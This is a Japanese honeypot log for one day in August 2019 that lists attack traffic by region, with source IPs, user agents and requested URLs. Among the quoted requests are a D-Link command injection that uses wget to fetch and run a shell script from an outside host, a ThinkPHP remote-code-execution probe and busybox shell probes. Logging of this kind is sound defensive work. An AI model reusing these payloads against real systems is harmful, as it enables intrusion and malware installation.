ハニーポット(仮) 観測記録 2019/08/06分です。

APでは
D-linkの脆弱性を狙うアクセス
OpenDreamBoxの脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
Hakai/2.0でのスキャン行為
Jorgeeでのスキャン行為
ZmEuでのスキャン行為
5[.]188[.]210[.]101に関する不正通信
を確認しました。

USでは
ThinkPHPの脆弱性を狙うアクセス
110[.]249[.]212[.]46に関する不正通信
5[.]188[.]210[.]101に関する不正通信
Gh0st\xadのアクセス
を確認しました。

EUでは
phpMyAdminに対するスキャン行為
ZmEuでのスキャン行為
110[.]249[.]212[.]46に関する不正通信
Gh0st\xadのアクセス
を確認しました。

アクセス数推移

AP：総アクセス数：125 (前日比：-363)
US：総アクセス数：20 (前日比：+2)
EU：総アクセス数：43 (前日比：+30)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Region：AP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	103.74.54.107	India
1	106.13.6.61	China
9	106.51.37.22	India
2	109.206.178.16	Netherlands
1	125.64.94.211	China
2	134.209.221.113	United States
9	139.59.145.209	Germany
2	142.93.150.96	Canada
2	153.126.166.53	Japan
2	160.16.127.253	Japan
2	167.71.69.220	United States
1	172.104.242.173	United States
9	187.188.145.38	Mexico
9	193.253.180.84	France
2	195.110.58.156	United Kingdom
3	195.154.86.34	France
2	206.81.6.222	United States
3	213.128.88.99	Turkey
2	213.6.16.226	Palestine
9	217.210.75.56	Sweden
2	45.67.219.18	United States
2	46.101.252.21	Germany
9	51.154.159.170	Switzerland
1	5.188.210.101	Russia
2	5.196.218.182	France
1	5.254.40.66	United States
9	61.32.227.146	South Korea
4	82.193.98.230	Ukraine
9	84.14.109.227	France
2	91.121.132.158	France
9	91.47.163.233	Germany
1	96.30.129.193	Canada

UserAgent一覧

件数	UserAgent
2	-
1	Hakai/2.0
1	Mozilla/5.0
3	Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
113	Mozilla/5.0 Jorgee
1	Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
1	Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
3	ZmEu

リクエスト内容一覧

件数	Method	Request	Protocol
1	-
9	GET	/db/	HTTP/1.1
1	GET	http://5[.]188[.]210[.]101/echo.php	HTTP/1.1
1	GET	/login.cgi?cli=aa%20aa%27;wget%20http://142[.]93[.]64[.]50/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$	HTTP/1.1
3	GET	/manager/html	HTTP/1.1
24	GET	/phpmyadmin/	HTTP/1.1
1	GET	/phpmyadmin/scripts/setup.php	HTTP/1.1
9	GET	/pma/	HTTP/1.1
10	GET	/PMA/	HTTP/1.1
1	GET	/pma/scripts/setup.php	HTTP/1.1
1	GET	/w00tw00t.at.blackhats.romanian.anti-sec:)	HTTP/1.1
1	GET	/webadmin/script?command=	busybox|HTTP/1.1
9	HEAD	/dbadmin/	HTTP/1.1
9	HEAD	/db/	HTTP/1.1
1	HEAD	/images/	HTTP/1.1
24	HEAD	/phpmyadmin/	HTTP/1.1
9	HEAD	/pma/	HTTP/1.1
10	HEAD	/PMA/	HTTP/1.1
1	\x16\x03\x01

Region:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	110.249.212.46	China
1	125.64.94.211	China
10	170.178.168.90	United States
1	172.104.242.173	United States
1	176.196.53.250	Russia
1	185.209.0.12	Latvia
1	5.188.210.101	Russia
1	62.45.102.33	Netherlands
1	64.121.155.96	United States
1	66.240.205.34	United States
1	85.93.20.170	Poland

UserAgent一覧

件数	UserAgent
6	-
1	Go-http-client/1.1
2	Mozilla/5.0
1	Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
1	Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)

リクエスト内容一覧

件数	Method	Request	Protocol
1	-
1	GET	/elrekt.php	HTTP/1.1
1	GET	/html/public/index.php	HTTP/1.1
1	GET	http://110[.]249[.]212[.]46/testget?q=23333&port=80	HTTP/1.1
1	GET	http://5[.]188[.]210[.]101/echo.php	HTTP/1.1
1	GET	/index.php	HTTP/1.1
1	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1	HTTP/1.1
1	GET	/public/index.php	HTTP/1.1
2	GET	/shell?busybox	HTTP/1.1
1	GET	/thinkphp/html/public/index.php	HTTP/1.1
1	GET	/TP/html/public/index.php	HTTP/1.1
1	GET	/TP/index.php	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
1	Gh0st\xad
1	HEAD	/images/	HTTP/1.1
1	POST	/index.php?s=captcha	HTTP/1.1
2	\x03
1	\x16\x03\x01

Region:EU

送信元IPアドレス一覧

件数	送信元IPアドレス	国
4	110.249.212.46	China
34	142.93.224.235	Netherlands
1	172.104.242.173	United States
1	185.209.0.12	Latvia
1	185.53.88.40	Estonia
1	66.240.205.34	United States
1	85.93.20.170	Poland

UserAgent一覧

件数	UserAgent
9	-
34	ZmEu

リクエスト内容一覧

件数	Method	Request	Protocol
1	-
1	GET	/admincooptel/phpMyAdmin/scripts/setup.php	HTTP/1.1
1	GET	/admin/phpmyadmin/scripts/setup.php	HTTP/1.1
1	GET	/admin/scripts/setup.php	HTTP/1.1
1	GET	/alt/sqladmin/scripts/setup.php	HTTP/1.1
1	GET	/configuracion/phpmyadmin/scripts/setup.php	HTTP/1.1
1	GET	/db/scripts/setup.php	HTTP/1.1
4	GET	http://110[.]249[.]212[.]46/testget?q=23333&port=80	HTTP/1.1
1	GET	/myadmin/scripts/setup.php	HTTP/1.1
1	GET	/MyAdmin/scripts/setup.php	HTTP/1.1
1	GET	/mysqladmin/scripts/setup.php	HTTP/1.1
1	GET	/mysql/scripts/setup.php	HTTP/1.1
1	GET	/MySQL/scripts/setup.php	HTTP/1.1
1	GET	/phpMyAdmin-2.8.0.4/scripts/setup.php	HTTP/1.1
1	GET	/phpMyAdmin2/scripts/setup.php	HTTP/1.1
1	GET	/phpmyadmin.box25/scripts/setup.php	HTTP/1.1
1	GET	/php-my-admin/scripts/setup.php	HTTP/1.1
1	GET	/phpmyadmin/scripts/setup.php	HTTP/1.1
1	GET	/_phpMyAdmin/scripts/setup.php	HTTP/1.1
1	GET	/phpMyAdmin/scripts/setup.php	HTTP/1.1
1	GET	/pHpMyAdMiN/scripts/setup.php	HTTP/1.1
1	GET	/phpmyadmin/scripts/setup.php/index.php	HTTP/1.1
1	GET	/phpMyAdmin-www072510/scripts/setup.php	HTTP/1.1
1	GET	/phpmy/scripts/setup.php	HTTP/1.1
1	GET	/phpmy/scripts/setup.php\	HTTP/1.1
1	GET	/php/phpMyAdmin/scripts/setup.php	HTTP/1.1
1	GET	/php/scripts/setup.php	HTTP/1.1
1	GET	/pma/scripts/setup.php	HTTP/1.1
1	GET	/PMA/scripts/setup.php	HTTP/1.1
1	GET	/pyaniste/mysqladmin/scripts/setup.php	HTTP/1.1
1	GET	/~riba/pma/scripts/setup.php	HTTP/1.1
1	GET	/scripts/setup.php	HTTP/1.1
1	GET	/sqladmin/scripts/setup.php	HTTP/1.1
1	GET	/w00tw00t.at.blackhats.romanian.anti-sec:)	HTTP/1.1
1	GET	/web/phpMyAdmin/scripts/setup.php	HTTP/1.1
1	GET	/websql/scripts/setup.php	HTTP/1.1
1	Gh0st\xad
1	HEAD	/robots.txt	HTTP/1.0
2	\x03